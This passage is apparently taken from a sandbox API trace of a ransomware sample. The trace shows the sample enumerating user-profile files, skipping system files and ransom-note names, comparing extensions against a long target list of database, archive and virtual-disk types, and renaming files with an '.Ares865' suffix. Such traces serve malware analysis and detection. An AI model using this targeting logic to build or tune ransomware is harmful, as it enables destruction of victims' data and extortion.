lpString2="NTUSER.DAT.LOG2" | out: lpString1="NTUSER.DAT.LOG2") returned="NTUSER.DAT.LOG2" [0057.562] lstrlenW (lpString="NTUSER.DAT.LOG2") returned 15 [0057.562] lstrlenW (lpString="Ares865") returned 7 [0057.562] lstrcmpiW (lpString1="AT.LOG2", lpString2="Ares865") returned 1 [0057.562] lstrlenW (lpString=".dll") returned 4 [0057.562] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2=".dll") returned 1 [0057.562] lstrlenW (lpString=".lnk") returned 4 [0057.562] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2=".lnk") returned 1 [0057.562] lstrlenW (lpString=".ini") returned 4 [0057.562] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2=".ini") returned 1 [0057.562] lstrlenW (lpString=".sys") returned 4 [0057.562] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2=".sys") returned 1 [0057.562] lstrlenW (lpString="NTUSER.DAT.LOG2") returned 15 [0057.562] lstrlenW (lpString="bak") returned 3 [0057.562] lstrcmpiW (lpString1="OG2", lpString2="bak") returned 1 [0057.562] lstrlenW (lpString="ba_") returned 3 [0057.562] lstrcmpiW (lpString1="OG2", lpString2="ba_") returned 1 [0057.562] lstrlenW (lpString="dbb") returned 3 [0057.562] lstrcmpiW (lpString1="OG2", lpString2="dbb") returned 1 [0057.562] lstrlenW (lpString="vmdk") returned 4 [0057.562] lstrcmpiW (lpString1="LOG2", lpString2="vmdk") returned -1 [0057.562] lstrlenW (lpString="rar") returned 3 [0057.562] lstrcmpiW (lpString1="OG2", lpString2="rar") returned -1 [0057.562] lstrlenW (lpString="zip") returned 3 [0057.562] lstrcmpiW (lpString1="OG2", lpString2="zip") returned -1 [0057.562] lstrlenW (lpString="tgz") returned 3 [0057.562] lstrcmpiW (lpString1="OG2", lpString2="tgz") returned -1 [0057.562] lstrlenW (lpString="vbox") returned 4 [0057.562] lstrcmpiW (lpString1="LOG2", lpString2="vbox") returned -1 [0057.563] lstrlenW (lpString="vdi") returned 3 [0057.563] lstrcmpiW (lpString1="OG2", lpString2="vdi") returned -1 [0057.563] lstrlenW (lpString="vhd") returned 3 [0057.563] lstrcmpiW (lpString1="OG2", lpString2="vhd") returned -1 [0057.563] lstrlenW (lpString="vhdx") returned 4 [0057.563] lstrcmpiW (lpString1="LOG2", lpString2="vhdx") returned -1 [0057.563] lstrlenW (lpString="avhd") returned 4 [0057.563] lstrcmpiW (lpString1="LOG2", lpString2="avhd") returned 1 [0057.563] lstrlenW (lpString="db") returned 2 [0057.563] lstrcmpiW (lpString1="G2", lpString2="db") returned 1 [0057.563] lstrlenW (lpString="db2") returned 3 [0057.563] lstrcmpiW (lpString1="OG2", lpString2="db2") returned 1 [0057.563] lstrlenW (lpString="db3") returned 3 [0057.563] lstrcmpiW (lpString1="OG2", lpString2="db3") returned 1 [0057.563] lstrlenW (lpString="dbf") returned 3 [0057.563] lstrcmpiW (lpString1="OG2", lpString2="dbf") returned 1 [0057.563] lstrlenW (lpString="mdf") returned 3 [0057.563] lstrcmpiW (lpString1="OG2", lpString2="mdf") returned 1 [0057.563] lstrlenW (lpString="mdb") returned 3 [0057.563] lstrcmpiW (lpString1="OG2", lpString2="mdb") returned 1 [0057.563] lstrlenW (lpString="sql") returned 3 [0057.563] lstrcmpiW (lpString1="OG2", lpString2="sql") returned -1 [0057.563] lstrlenW (lpString="sqlite") returned 6 [0057.563] lstrcmpiW (lpString1="T.LOG2", lpString2="sqlite") returned 1 [0057.563] lstrlenW (lpString="sqlite3") returned 7 [0057.563] lstrcmpiW (lpString1="AT.LOG2", lpString2="sqlite3") returned -1 [0057.563] lstrlenW (lpString="sqlitedb") returned 8 [0057.563] lstrcmpiW (lpString1="DAT.LOG2", lpString2="sqlitedb") returned -1 [0057.563] lstrlenW (lpString="xml") returned 3 [0057.563] lstrcmpiW (lpString1="OG2", lpString2="xml") returned -1 [0057.563] lstrlenW (lpString="$er") returned 3 [0057.563] lstrcmpiW (lpString1="OG2", lpString2="$er") returned 1 [0057.563] lstrlenW (lpString="4dd") returned 3 [0057.563] lstrcmpiW (lpString1="OG2", lpString2="4dd") returned 1 [0057.563] lstrlenW (lpString="4dl") returned 3 [0057.563] lstrcmpiW (lpString1="OG2", lpString2="4dl") returned 1 [0057.563] lstrlenW (lpString="^^^") returned 3 [0057.564] lstrcmpiW (lpString1="OG2", lpString2="^^^") returned 1 [0057.564] lstrlenW (lpString="abs") returned 3 [0057.564] lstrcmpiW (lpString1="OG2", lpString2="abs") returned 1 [0057.564] lstrlenW (lpString="abx") returned 3 [0057.564] lstrcmpiW (lpString1="OG2", lpString2="abx") returned 1 [0057.564] lstrlenW (lpString="accdb") returned 5 [0057.564] lstrcmpiW (lpString1=".LOG2", lpString2="accdb") returned -1 [0057.564] lstrlenW (lpString="accdc") returned 5 [0057.564] lstrcmpiW (lpString1=".LOG2", lpString2="accdc") returned -1 [0057.564] lstrlenW (lpString="accde") returned 5 [0057.564] lstrcmpiW (lpString1=".LOG2", lpString2="accde") returned -1 [0057.564] lstrlenW (lpString="accdr") returned 5 [0057.564] lstrcmpiW (lpString1=".LOG2", lpString2="accdr") returned -1 [0057.564] lstrlenW (lpString="accdt") returned 5 [0057.564] lstrcmpiW (lpString1=".LOG2", lpString2="accdt") returned -1 [0057.564] lstrlenW (lpString="accdw") returned 5 [0057.564] lstrcmpiW (lpString1=".LOG2", lpString2="accdw") returned -1 [0057.564] lstrlenW (lpString="accft") returned 5 [0057.564] lstrcmpiW (lpString1=".LOG2", lpString2="accft") returned -1 [0057.564] lstrlenW (lpString="adb") returned 3 [0057.564] lstrcmpiW (lpString1="OG2", lpString2="adb") returned 1 [0057.564] lstrlenW (lpString="adb") returned 3 [0057.564] lstrcmpiW (lpString1="OG2", lpString2="adb") returned 1 [0057.564] lstrlenW (lpString="ade") returned 3 [0057.564] lstrcmpiW (lpString1="OG2", lpString2="ade") returned 1 [0057.564] lstrlenW (lpString="adf") returned 3 [0057.564] lstrcmpiW (lpString1="OG2", lpString2="adf") returned 1 [0057.564] lstrlenW (lpString="adn") returned 3 [0057.564] lstrcmpiW (lpString1="OG2", lpString2="adn") returned 1 [0057.564] lstrlenW (lpString="adp") returned 3 [0057.564] lstrcmpiW (lpString1="OG2", lpString2="adp") returned 1 [0057.564] lstrlenW (lpString="alf") returned 3 [0057.564] lstrcmpiW (lpString1="OG2", lpString2="alf") returned 1 [0057.564] lstrlenW (lpString="ask") returned 3 [0057.564] lstrcmpiW (lpString1="OG2", lpString2="ask") returned 1 [0057.564] lstrlenW (lpString="btr") returned 3 [0057.564] lstrcmpiW (lpString1="OG2", lpString2="btr") returned 1 [0057.564] lstrlenW (lpString="cat") returned 3 [0057.565] lstrcmpiW (lpString1="OG2", lpString2="cat") returned 1 [0057.565] lstrlenW (lpString="cdb") returned 3 [0057.565] lstrcmpiW (lpString1="OG2", lpString2="cdb") returned 1 [0057.565] lstrlenW (lpString="ckp") returned 3 [0057.565] lstrcmpiW (lpString1="OG2", lpString2="ckp") returned 1 [0057.565] lstrlenW (lpString="cma") returned 3 [0057.565] lstrcmpiW (lpString1="OG2", lpString2="cma") returned 1 [0057.565] lstrlenW (lpString="cpd") returned 3 [0057.565] lstrcmpiW (lpString1="OG2", lpString2="cpd") returned 1 [0057.565] lstrlenW (lpString="dacpac") returned 6 [0057.565] lstrcmpiW (lpString1="T.LOG2", lpString2="dacpac") returned 1 [0057.565] lstrlenW (lpString="dad") returned 3 [0057.565] lstrcmpiW (lpString1="OG2", lpString2="dad") returned 1 [0057.565] lstrlenW (lpString="dadiagrams") returned 10 [0057.565] lstrcmpiW (lpString1="R.DAT.LOG2", lpString2="dadiagrams") returned 1 [0057.565] lstrlenW (lpString="daschema") returned 8 [0057.565] lstrcmpiW (lpString1="DAT.LOG2", lpString2="daschema") returned 1 [0057.565] lstrlenW (lpString="db-journal") returned 10 [0057.565] lstrcmpiW (lpString1="R.DAT.LOG2", lpString2="db-journal") returned 1 [0057.565] lstrlenW (lpString="db-shm") returned 6 [0057.565] lstrcmpiW (lpString1="T.LOG2", lpString2="db-shm") returned 1 [0057.565] lstrlenW (lpString="db-wal") returned 6 [0057.565] lstrcmpiW (lpString1="T.LOG2", lpString2="db-wal") returned 1 [0057.565] lstrlenW (lpString="dbc") returned 3 [0057.565] lstrcmpiW (lpString1="OG2", lpString2="dbc") returned 1 [0057.565] lstrlenW (lpString="dbs") returned 3 [0057.565] lstrcmpiW (lpString1="OG2", lpString2="dbs") returned 1 [0057.565] lstrlenW (lpString="dbt") returned 3 [0057.565] lstrcmpiW (lpString1="OG2", lpString2="dbt") returned 1 [0057.565] lstrlenW (lpString="dbv") returned 3 [0057.565] lstrcmpiW (lpString1="OG2", lpString2="dbv") returned 1 [0057.565] lstrlenW (lpString="dbx") returned 3 [0057.565] lstrcmpiW (lpString1="OG2", lpString2="dbx") returned 1 [0057.565] lstrlenW (lpString="dcb") returned 3 [0057.565] lstrcmpiW (lpString1="OG2", lpString2="dcb") returned 1 [0057.565] lstrlenW (lpString="dct") returned 3 [0057.565] lstrcmpiW (lpString1="OG2", lpString2="dct") returned 1 [0057.565] lstrlenW (lpString="dcx") returned 3 [0057.566] lstrcmpiW (lpString1="OG2", lpString2="dcx") returned 1 [0057.566] lstrlenW (lpString="ddl") returned 3 [0057.566] lstrcmpiW (lpString1="OG2", lpString2="ddl") returned 1 [0057.566] lstrlenW (lpString="dlis") returned 4 [0057.566] lstrcmpiW (lpString1="LOG2", lpString2="dlis") returned 1 [0057.566] lstrlenW (lpString="dp1") returned 3 [0057.566] lstrcmpiW (lpString1="OG2", lpString2="dp1") returned 1 [0057.566] lstrlenW (lpString="dqy") returned 3 [0057.566] lstrcmpiW (lpString1="OG2", lpString2="dqy") returned 1 [0057.566] lstrlenW (lpString="dsk") returned 3 [0057.566] lstrcmpiW (lpString1="OG2", lpString2="dsk") returned 1 [0057.566] lstrlenW (lpString="dsn") returned 3 [0057.566] lstrcmpiW (lpString1="OG2", lpString2="dsn") returned 1 [0057.566] lstrlenW (lpString="dtsx") returned 4 [0057.566] lstrcmpiW (lpString1="LOG2", lpString2="dtsx") returned 1 [0057.566] lstrlenW (lpString="dxl") returned 3 [0057.566] lstrcmpiW (lpString1="OG2", lpString2="dxl") returned 1 [0057.566] lstrlenW (lpString="eco") returned 3 [0057.566] lstrcmpiW (lpString1="OG2", lpString2="eco") returned 1 [0057.566] lstrlenW (lpString="ecx") returned 3 [0057.566] lstrcmpiW (lpString1="OG2", lpString2="ecx") returned 1 [0057.566] lstrlenW (lpString="edb") returned 3 [0057.566] lstrcmpiW (lpString1="OG2", lpString2="edb") returned 1 [0057.566] lstrlenW (lpString="epim") returned 4 [0057.566] lstrcmpiW (lpString1="LOG2", lpString2="epim") returned 1 [0057.566] lstrlenW (lpString="fcd") returned 3 [0057.566] lstrcmpiW (lpString1="OG2", lpString2="fcd") returned 1 [0057.566] lstrlenW (lpString="fdb") returned 3 [0057.566] lstrcmpiW (lpString1="OG2", lpString2="fdb") returned 1 [0057.566] lstrlenW (lpString="fic") returned 3 [0057.566] lstrcmpiW (lpString1="OG2", lpString2="fic") returned 1 [0057.566] lstrlenW (lpString="flexolibrary") returned 12 [0057.566] lstrcmpiW (lpString1="SER.DAT.LOG2", lpString2="flexolibrary") returned 1 [0057.566] lstrlenW (lpString="fm5") returned 3 [0057.566] lstrcmpiW (lpString1="OG2", lpString2="fm5") returned 1 [0057.566] lstrlenW (lpString="fmp") returned 3 [0057.567] lstrcmpiW (lpString1="OG2", lpString2="fmp") returned 1 [0057.567] lstrlenW (lpString="fmp12") returned 5 [0057.567] lstrcmpiW (lpString1=".LOG2", lpString2="fmp12") returned -1 [0057.567] lstrlenW (lpString="fmpsl") returned 5 [0057.567] lstrcmpiW (lpString1=".LOG2", lpString2="fmpsl") returned -1 [0057.567] lstrlenW (lpString="fol") returned 3 [0057.567] lstrcmpiW (lpString1="OG2", lpString2="fol") returned 1 [0057.567] lstrlenW (lpString="fp3") returned 3 [0057.567] lstrcmpiW (lpString1="OG2", lpString2="fp3") returned 1 [0057.567] lstrlenW (lpString="fp4") returned 3 [0057.567] lstrcmpiW (lpString1="OG2", lpString2="fp4") returned 1 [0057.567] lstrlenW (lpString="fp5") returned 3 [0057.567] lstrcmpiW (lpString1="OG2", lpString2="fp5") returned 1 [0057.567] lstrlenW (lpString="fp7") returned 3 [0057.567] lstrcmpiW (lpString1="OG2", lpString2="fp7") returned 1 [0057.567] lstrlenW (lpString="fpt") returned 3 [0057.567] lstrcmpiW (lpString1="OG2", lpString2="fpt") returned 1 [0057.567] lstrlenW (lpString="frm") returned 3 [0057.567] lstrcmpiW (lpString1="OG2", lpString2="frm") returned 1 [0057.567] lstrlenW (lpString="gdb") returned 3 [0057.567] lstrcmpiW (lpString1="OG2", lpString2="gdb") returned 1 [0057.567] lstrlenW (lpString="gdb") returned 3 [0057.567] lstrcmpiW (lpString1="OG2", lpString2="gdb") returned 1 [0057.567] lstrlenW (lpString="grdb") returned 4 [0057.567] lstrcmpiW (lpString1="LOG2", lpString2="grdb") returned 1 [0057.567] lstrlenW (lpString="gwi") returned 3 [0057.567] lstrcmpiW (lpString1="OG2", lpString2="gwi") returned 1 [0057.567] lstrlenW (lpString="hdb") returned 3 [0057.567] lstrcmpiW (lpString1="OG2", lpString2="hdb") returned 1 [0057.567] lstrlenW (lpString="his") returned 3 [0057.567] lstrcmpiW (lpString1="OG2", lpString2="his") returned 1 [0057.567] lstrlenW (lpString="ib") returned 2 [0057.567] lstrcmpiW (lpString1="G2", lpString2="ib") returned -1 [0057.567] lstrlenW (lpString="idb") returned 3 [0057.567] lstrcmpiW (lpString1="OG2", lpString2="idb") returned 1 [0057.567] lstrlenW (lpString="ihx") returned 3 [0057.567] lstrcmpiW (lpString1="OG2", lpString2="ihx") returned 1 [0057.567] lstrlenW (lpString="itdb") returned 4 [0057.568] lstrcmpiW (lpString1="LOG2", lpString2="itdb") returned 1 [0057.568] lstrlenW (lpString="itw") returned 3 [0057.568] lstrcmpiW (lpString1="OG2", lpString2="itw") returned 1 [0057.568] lstrlenW (lpString="jet") returned 3 [0057.568] lstrcmpiW (lpString1="OG2", lpString2="jet") returned 1 [0057.568] lstrlenW (lpString="jtx") returned 3 [0057.568] lstrcmpiW (lpString1="OG2", lpString2="jtx") returned 1 [0057.568] lstrlenW (lpString="kdb") returned 3 [0057.568] lstrcmpiW (lpString1="OG2", lpString2="kdb") returned 1 [0057.568] lstrlenW (lpString="kexi") returned 4 [0057.568] lstrcmpiW (lpString1="LOG2", lpString2="kexi") returned 1 [0057.568] lstrlenW (lpString="kexic") returned 5 [0057.568] lstrcmpiW (lpString1=".LOG2", lpString2="kexic") returned -1 [0057.568] lstrlenW (lpString="kexis") returned 5 [0057.568] lstrcmpiW (lpString1=".LOG2", lpString2="kexis") returned -1 [0057.568] lstrlenW (lpString="lgc") returned 3 [0057.568] lstrcmpiW (lpString1="OG2", lpString2="lgc") returned 1 [0057.568] lstrlenW (lpString="lwx") returned 3 [0057.568] lstrcmpiW (lpString1="OG2", lpString2="lwx") returned 1 [0057.568] lstrlenW (lpString="maf") returned 3 [0057.568] lstrcmpiW (lpString1="OG2", lpString2="maf") returned 1 [0057.568] lstrlenW (lpString="maq") returned 3 [0057.568] lstrcmpiW (lpString1="OG2", lpString2="maq") returned 1 [0057.568] lstrlenW (lpString="mar") returned 3 [0057.568] lstrcmpiW (lpString1="OG2", lpString2="mar") returned 1 [0057.568] lstrlenW (lpString="marshal") returned 7 [0057.568] lstrcmpiW (lpString1="AT.LOG2", lpString2="marshal") returned -1 [0057.568] lstrlenW (lpString="mas") returned 3 [0057.568] lstrcmpiW (lpString1="OG2", lpString2="mas") returned 1 [0057.568] lstrlenW (lpString="mav") returned 3 [0057.568] lstrcmpiW (lpString1="OG2", lpString2="mav") returned 1 [0057.568] lstrlenW (lpString="maw") returned 3 [0057.568] lstrcmpiW (lpString1="OG2", lpString2="maw") returned 1 [0057.568] lstrlenW (lpString="mdbhtml") returned 7 [0057.568] lstrcmpiW (lpString1="AT.LOG2", lpString2="mdbhtml") returned -1 [0057.568] lstrlenW (lpString="mdn") returned 3 [0057.568] lstrcmpiW (lpString1="OG2", lpString2="mdn") returned 1 [0057.568] lstrlenW (lpString="mdt") returned 3 [0057.569] lstrcmpiW (lpString1="OG2", lpString2="mdt") returned 1 [0057.569] lstrlenW (lpString="mfd") returned 3 [0057.569] lstrcmpiW (lpString1="OG2", lpString2="mfd") returned 1 [0057.569] lstrlenW (lpString="mpd") returned 3 [0057.569] lstrcmpiW (lpString1="OG2", lpString2="mpd") returned 1 [0057.569] lstrlenW (lpString="mrg") returned 3 [0057.569] lstrcmpiW (lpString1="OG2", lpString2="mrg") returned 1 [0057.569] lstrlenW (lpString="mud") returned 3 [0057.569] lstrcmpiW (lpString1="OG2", lpString2="mud") returned 1 [0057.569] lstrlenW (lpString="mwb") returned 3 [0057.569] lstrcmpiW (lpString1="OG2", lpString2="mwb") returned 1 [0057.569] lstrlenW (lpString="myd") returned 3 [0057.569] lstrcmpiW (lpString1="OG2", lpString2="myd") returned 1 [0057.569] lstrlenW (lpString="ndf") returned 3 [0057.569] lstrcmpiW (lpString1="OG2", lpString2="ndf") returned 1 [0057.569] lstrlenW (lpString="nnt") returned 3 [0057.569] lstrcmpiW (lpString1="OG2", lpString2="nnt") returned 1 [0057.569] lstrlenW (lpString="nrmlib") returned 6 [0057.569] lstrcmpiW (lpString1="T.LOG2", lpString2="nrmlib") returned 1 [0057.569] lstrlenW (lpString="ns2") returned 3 [0057.569] lstrcmpiW (lpString1="OG2", lpString2="ns2") returned 1 [0057.569] lstrlenW (lpString="ns3") returned 3 [0057.569] lstrcmpiW (lpString1="OG2", lpString2="ns3") returned 1 [0057.569] lstrlenW (lpString="ns4") returned 3 [0057.569] lstrcmpiW (lpString1="OG2", lpString2="ns4") returned 1 [0057.569] lstrlenW (lpString="nsf") returned 3 [0057.569] lstrcmpiW (lpString1="OG2", lpString2="nsf") returned 1 [0057.569] lstrlenW (lpString="nv") returned 2 [0057.569] lstrcmpiW (lpString1="G2", lpString2="nv") returned -1 [0057.569] lstrlenW (lpString="nv2") returned 3 [0057.569] lstrcmpiW (lpString1="OG2", lpString2="nv2") returned 1 [0057.569] lstrlenW (lpString="nwdb") returned 4 [0057.569] lstrcmpiW (lpString1="LOG2", lpString2="nwdb") returned -1 [0057.569] lstrlenW (lpString="nyf") returned 3 [0057.569] lstrcmpiW (lpString1="OG2", lpString2="nyf") returned 1 [0057.569] lstrlenW (lpString="odb") returned 3 [0057.569] lstrcmpiW (lpString1="OG2", lpString2="odb") returned 1 [0057.569] lstrlenW (lpString="odb") returned 3 [0057.570] lstrcmpiW (lpString1="OG2", lpString2="odb") returned 1 [0057.570] lstrlenW (lpString="oqy") returned 3 [0057.570] lstrcmpiW (lpString1="OG2", lpString2="oqy") returned -1 [0057.570] lstrlenW (lpString="ora") returned 3 [0057.570] lstrcmpiW (lpString1="OG2", lpString2="ora") returned -1 [0057.570] lstrlenW (lpString="orx") returned 3 [0057.570] lstrcmpiW (lpString1="OG2", lpString2="orx") returned -1 [0057.570] lstrlenW (lpString="owc") returned 3 [0057.570] lstrcmpiW (lpString1="OG2", lpString2="owc") returned -1 [0057.570] lstrlenW (lpString="p96") returned 3 [0057.570] lstrcmpiW (lpString1="OG2", lpString2="p96") returned -1 [0057.570] lstrlenW (lpString="p97") returned 3 [0057.570] lstrcmpiW (lpString1="OG2", lpString2="p97") returned -1 [0057.570] lstrlenW (lpString="pan") returned 3 [0057.570] lstrcmpiW (lpString1="OG2", lpString2="pan") returned -1 [0057.570] lstrlenW (lpString="pdb") returned 3 [0057.570] lstrcmpiW (lpString1="OG2", lpString2="pdb") returned -1 [0057.570] lstrlenW (lpString="pdm") returned 3 [0057.570] lstrcmpiW (lpString1="OG2", lpString2="pdm") returned -1 [0057.570] lstrlenW (lpString="pnz") returned 3 [0057.570] lstrcmpiW (lpString1="OG2", lpString2="pnz") returned -1 [0057.570] lstrlenW (lpString="qry") returned 3 [0057.570] lstrcmpiW (lpString1="OG2", lpString2="qry") returned -1 [0057.570] lstrlenW (lpString="qvd") returned 3 [0057.570] lstrcmpiW (lpString1="OG2", lpString2="qvd") returned -1 [0057.570] lstrlenW (lpString="rbf") returned 3 [0057.570] lstrcmpiW (lpString1="OG2", lpString2="rbf") returned -1 [0057.570] lstrlenW (lpString="rctd") returned 4 [0057.570] lstrcmpiW (lpString1="LOG2", lpString2="rctd") returned -1 [0057.570] lstrlenW (lpString="rod") returned 3 [0057.570] lstrcmpiW (lpString1="OG2", lpString2="rod") returned -1 [0057.570] lstrlenW (lpString="rodx") returned 4 [0057.570] lstrcmpiW (lpString1="LOG2", lpString2="rodx") returned -1 [0057.570] lstrlenW (lpString="rpd") returned 3 [0057.570] lstrcmpiW (lpString1="OG2", lpString2="rpd") returned -1 [0057.570] lstrlenW (lpString="rsd") returned 3 [0057.571] lstrcmpiW (lpString1="OG2", lpString2="rsd") returned -1 [0057.571] lstrlenW (lpString="sas7bdat") returned 8 [0057.571] lstrcmpiW (lpString1="DAT.LOG2", lpString2="sas7bdat") returned -1 [0057.571] lstrlenW (lpString="sbf") returned 3 [0057.571] lstrcmpiW (lpString1="OG2", lpString2="sbf") returned -1 [0057.571] lstrlenW (lpString="scx") returned 3 [0057.571] lstrcmpiW (lpString1="OG2", lpString2="scx") returned -1 [0057.571] lstrlenW (lpString="sdb") returned 3 [0057.571] lstrcmpiW (lpString1="OG2", lpString2="sdb") returned -1 [0057.571] lstrlenW (lpString="sdc") returned 3 [0057.571] lstrcmpiW (lpString1="OG2", lpString2="sdc") returned -1 [0057.571] lstrlenW (lpString="sdf") returned 3 [0057.571] lstrcmpiW (lpString1="OG2", lpString2="sdf") returned -1 [0057.571] lstrlenW (lpString="sis") returned 3 [0057.571] lstrcmpiW (lpString1="OG2", lpString2="sis") returned -1 [0057.571] lstrlenW (lpString="spq") returned 3 [0057.571] lstrcmpiW (lpString1="OG2", lpString2="spq") returned -1 [0057.571] lstrlenW (lpString="te") returned 2 [0057.571] lstrcmpiW (lpString1="G2", lpString2="te") returned -1 [0057.571] lstrlenW (lpString="teacher") returned 7 [0057.571] lstrcmpiW (lpString1="AT.LOG2", lpString2="teacher") returned -1 [0057.571] lstrlenW (lpString="tmd") returned 3 [0057.571] lstrcmpiW (lpString1="OG2", lpString2="tmd") returned -1 [0057.571] lstrlenW (lpString="tps") returned 3 [0057.571] lstrcmpiW (lpString1="OG2", lpString2="tps") returned -1 [0057.571] lstrlenW (lpString="trc") returned 3 [0057.571] lstrcmpiW (lpString1="OG2", lpString2="trc") returned -1 [0057.571] lstrlenW (lpString="trc") returned 3 [0057.571] lstrcmpiW (lpString1="OG2", lpString2="trc") returned -1 [0057.571] lstrlenW (lpString="trm") returned 3 [0057.571] lstrcmpiW (lpString1="OG2", lpString2="trm") returned -1 [0057.571] lstrlenW (lpString="udb") returned 3 [0057.571] lstrcmpiW (lpString1="OG2", lpString2="udb") returned -1 [0057.571] lstrlenW (lpString="udl") returned 3 [0057.571] lstrcmpiW (lpString1="OG2", lpString2="udl") returned -1 [0057.571] lstrlenW (lpString="usr") returned 3 [0057.571] lstrcmpiW (lpString1="OG2", lpString2="usr") returned -1 [0057.572] lstrlenW (lpString="v12") returned 3 [0057.572] lstrcmpiW (lpString1="OG2", lpString2="v12") returned -1 [0057.572] lstrlenW (lpString="vis") returned 3 [0057.572] lstrcmpiW (lpString1="OG2", lpString2="vis") returned -1 [0057.572] lstrlenW (lpString="vpd") returned 3 [0057.572] lstrcmpiW (lpString1="OG2", lpString2="vpd") returned -1 [0057.572] lstrlenW (lpString="vvv") returned 3 [0057.572] lstrcmpiW (lpString1="OG2", lpString2="vvv") returned -1 [0057.572] lstrlenW (lpString="wdb") returned 3 [0057.572] lstrcmpiW (lpString1="OG2", lpString2="wdb") returned -1 [0057.572] lstrlenW (lpString="wmdb") returned 4 [0057.572] lstrcmpiW (lpString1="LOG2", lpString2="wmdb") returned -1 [0057.572] lstrlenW (lpString="wrk") returned 3 [0057.572] lstrcmpiW (lpString1="OG2", lpString2="wrk") returned -1 [0057.572] lstrlenW (lpString="xdb") returned 3 [0057.572] lstrcmpiW (lpString1="OG2", lpString2="xdb") returned -1 [0057.572] lstrlenW (lpString="xld") returned 3 [0057.572] lstrcmpiW (lpString1="OG2", lpString2="xld") returned -1 [0057.572] lstrlenW (lpString="xmlff") returned 5 [0057.572] lstrcmpiW (lpString1=".LOG2", lpString2="xmlff") returned -1 [0057.572] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\NTUSER.DAT.LOG2.Ares865") returned 45 [0057.572] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default user\\ntuser.dat.log2"), lpNewFileName="C:\\Users\\Default User\\NTUSER.DAT.LOG2.Ares865" (normalized: "c:\\users\\default user\\ntuser.dat.log2.ares865"), dwFlags=0x1) returned 1 [0057.573] CreateFileW (lpFileName="C:\\Users\\Default User\\NTUSER.DAT.LOG2.Ares865" (normalized: "c:\\users\\default user\\ntuser.dat.log2.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0057.573] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0057.573] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0057.573] CloseHandle (hObject=0x0) returned 0 [0057.573] CloseHandle (hObject=0x15c) returned 1 [0057.574] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf8d30919, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xf8d30919, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0xf8ead6dc, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0057.574] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.574] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="aoldtz.exe") returned 1 [0057.574] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2=".") returned 1 [0057.574] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="..") returned 1 [0057.574] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="windows") returned -1 [0057.574] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="bootmgr") returned 1 [0057.574] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="temp") returned -1 [0057.574] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="pagefile.sys") returned -1 [0057.574] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="boot") returned 1 [0057.574] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="ids.txt") returned 1 [0057.574] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="ntuser.dat") returned 1 [0057.574] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="perflogs") returned -1 [0057.574] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="MSBuild") returned 1 [0057.574] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 55 [0057.574] lstrlenW (lpString="C:\\Users\\Default User\\NTUSER.DAT.LOG2") returned 37 [0057.574] lstrcpyW (in: lpString1=0x2cce42c, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0057.574] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 55 [0057.574] lstrlenW (lpString="Ares865") returned 7 [0057.574] lstrcmpiW (lpString1=".TM.blf", lpString2="Ares865") returned -1 [0057.574] lstrlenW (lpString=".dll") returned 4 [0057.574] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2=".dll") returned 1 [0057.574] lstrlenW 